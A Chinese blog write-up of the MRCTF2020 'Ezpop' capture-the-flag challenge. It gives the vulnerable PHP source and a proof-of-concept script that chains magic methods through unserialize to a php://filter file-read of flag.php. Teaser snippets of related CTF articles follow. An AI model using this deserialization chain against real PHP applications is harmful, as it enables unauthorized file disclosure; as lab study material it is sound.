POP链[MRCTF2020]Ezpop

最新推荐文章于 2024-06-18 19:56:49 发布
最新推荐文章于 2024-06-18 19:56:49 发布
阅读量105 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxiaodi/article/details/131155475
版权

题目代码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

POC

<?php
class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a=new Modifier();
$b=new Show();
$c=new Test();

$c->p=$a;
$b->source=$b;
$b->str=$c;

$b=serialize($b);
echo urlencode($b);

?>
cl1mb3r
关注
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 476
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
【buuctfMRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1194
真的很详细
ctf-pop
qq_32445755的博客
05-15 2030
POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
CTF里WEB题中的POP
dangejinghong的博客
09-03 587
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2808
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化——pop构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 924
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的条是(反推)
POP构造
VZS_0的博客
02-23 1786
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
[MRCTF2020]Ezpop --对pop构造的简单理解
StevenOnesir的博客
12-31 3219
  简单的序列化攻击是因为对魔术方法的自动调用而触发漏洞,但如果关键代码不在魔术方法,而是在一个类的普通方法中,则需要观察联系类与函数之间的关系,将其与魔术方法的利用结合起来,这时候就可以利用pop的构造与攻击。 首先题目界面直接给出了源码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%
mrctf2020_shellcode详解
勿山几已
06-09 726
简单演示mrctf2020_shellcode解题步骤
[MRCTF2020]Ezpop序列化popWP
qq_41996851的博客
05-14 619
题目给了代码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var;
pop详细分析、构造(以[NISACTF 2022]babyserialize为例)
最新发布
2401_82985722的博客
06-18 1140
传入发现只有提示flag在根目录,可直接使用system("cat /flag");在所有类中找,发现huang调用了fun,但在Ilovetxw类里不存在参数 fun。找到eval()函数,可以利用参数txw4ever,调用系统函数system等实现。故在所有类中找,去找类似$a()的对象函数,发现$bb(),它对应的参数是su。2.实例化类Ilovetxw赋值给b,从中调用参数su传入NISA类。,由于fun属性为private,故直接在类里面修改。在所有类中找,发现nisa(),该类中不存在方法。
babyGo(安恒2019.1 pop的构造)
stepone4ward的博客
02-24 2229
周周练的时候看了一叶飘零师傅的博客才知道pop的存在(还是太菜了啊),先来学习一下关于pop的知识。 再看一看这道题目的baby类 也就是说这道题目中的类baby调用了sec类的read()方法。l 但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。 这个时候就要利用最开始提到的...
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 687
php反序列化,构造pop
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2175
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF web2】
qq_52648141的博客
03-12 839
反序列化漏洞:也叫对象注入,就是当程序在进行反序列化时,会自动调用一些函数,但是如果传入函数的参数可以被用户控制的话,用卢可以输入一些恶意代码到函数中,从而导致反序列化漏洞。POP(面向属性编程)是指从现有运行环境中寻找一系列的代码或指令调用,然后根据需求构造出一组连续的调用。2.外部赋值:优点是可以赋值任意类型的值,缺点是只能操作public属性。3.构造方法赋值(万能方法)︰优点是解决了上述的全部缺点,缺点是有点麻烦。实现函数是:serialize()和unserialize()
POP的构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4428
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
[MRCTF2020]Ezpop
feng的博客
11-25 227
知识点 PHP反序列化POP 知识点 是一道简单的PHP反序列化POP的题目: <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { prote
PHP反序列化--简单ctf题--pop(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4694
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
[MRCTF2020]Ezpop 1——pop的反序列化
m0_62879498的博客
05-11 2160
[MRCTF2020]Ezpop 1 进入环境,得到源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值